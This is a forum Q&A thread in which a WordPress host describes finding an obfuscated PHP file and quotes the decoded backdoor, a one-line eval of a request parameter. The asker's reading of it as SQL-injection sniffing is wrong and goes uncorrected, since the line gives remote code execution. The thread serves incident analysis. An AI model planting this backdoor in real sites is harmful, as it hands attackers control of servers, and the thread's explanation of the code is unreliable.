WordPress hack attempt

Question

I run a VPS with a couple of dozen WordPress installs for small customer websites.

I just noticed one site has a php script called "pnxnfup.php" which has a load base64 alphanumber characters within it.

In the root of the site there are also a lot of files with no extension - just random alphanum strings - withih said files it looks like IP addresses are being logged - I'm guessing these are visitor IP addresses (mine is in there).

Anyone any idea what type of exploit this might be?

UPDATE: 18/12/12

Ok I managed to decode the contents of pnxnfup.php

When I decoded the original php file, it contained MORE base64 encoded content peppered with random gibberish php comments which I had to strip out manually before I could decode the rest of the file.

Once I decoded that I found yet MORE base64 encoded strings with MORE gibberish php comments. Once I repeated the stripping and decoding process (phew!) I was left with this:

if(isset($_REQUEST['a'.'s'.'c']))
eval
(stripslashes($_REQUEST['a'.'sc']));

I understand roughly what this code is doing (sniffing for requests with asc parameters which would indicate a url that could be targetted for sql injection) but I don't see how this can be of value to a hacker on it's own. I'm guessing the hack must permeate deeper and I'm missing something else?

Answer 1

This seems to be fairly common, if you check the wordpress support site

But what it is exactly is hard to tell, if I were you I'd setup a sandboxed environment and play around a bit with it to figure out the purpose of the hack.

Answer 2

Probably this website is using a "free" theme. Most of these has codes that collect your password and login to add malware scripts on your website. Do you have a back-up of your website? I highly recommend you to clean all the files, then change your FTP password (and login, if possible), then re-upload everything.

Btw, maybe Sucuri can help you to find some infected files: http://sitecheck.sucuri.net/results/YOURURL.com/